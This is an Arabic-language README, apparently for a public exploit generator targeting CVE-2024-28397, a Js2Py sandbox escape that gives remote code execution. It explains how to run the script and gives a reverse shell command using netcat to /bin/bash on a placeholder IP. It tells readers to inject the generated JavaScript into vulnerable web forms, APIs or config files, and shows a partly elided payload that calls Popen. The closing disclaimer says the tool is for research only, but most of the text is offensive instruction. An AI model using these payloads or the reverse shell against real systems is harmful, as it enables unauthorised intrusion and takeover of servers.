
استغلال احترافي لـ CVE-2024-28397: هروب من صندوق حماية Js2Py يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE). يتضمن توليد حمولة نمطية.
💡 غوص عميق: انقر هنا لقراءة الإحاطة الفنية الكاملة (PDF).
مولد حمولة احترافي لـ CVE-2024-28397. تقوم هذه الأداة بإنشاء كود JavaScript خبيث مصمم للهروب من حماية js2py (الإصدارات <= 0.74) وتنفيذ أوامر عشوائية على النظام المستهدف.
Js2Py <= 0.74Object.getOwnPropertyNames للوصول إلى صنف subprocess.Popen الخاص بـ Python من داخل بيئة JavaScript.يقوم هذا السكريبت بتوليد حمولة JavaScript الدقيقة اللازمة لاستغلال الثغرة. لا تحتاج إلى تثبيت js2py لاستخدام هذه الأداة.
قم بتشغيل السكريبت مع الأمر الذي تريد تنفيذه على جهاز الضحية.
# توليد حمولة لتنفيذ 'id'
python3 exploit.py -c "id"
# توليد حمولة لـ Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
انسخ الإخراج الذي يولده السكريبت وحقنه في التطبيق الثغري (مثل: نموذج ويب، نقطة نهاية API، أو ملف إعداد يتم تحليله بواسطة js2py).
مثال على الحقن:
إذا كان موقع ويب يأخذ إدخال المستخدم ويشغله باستخدام js2py.eval_js(user_input)، فسيؤدي لصق الكود المُولّد إلى تنفيذ أمرك على الخادم.
$ python3 exploit.py -c "whoami"
var output = "Initial";
try {
var leaked_wrapper = Object.getOwnPropertyNames({});
// ... (الكود الخبيث الكامل) ...
var res = Popen("whoami", ...).communicate();
output = res;
} ...
output
Ali Sünbül (xeloxa)
تم تقديم هذا البرنامج لأغراض تعليمية وبحوث أمنية فقط. المؤلف لا يتحمل أي مسؤولية عن أي سوء استخدام لهذا الكود. تأكد من الحصول على إذن صريح قبل اختبار هذا على أي نظام لا تملكه.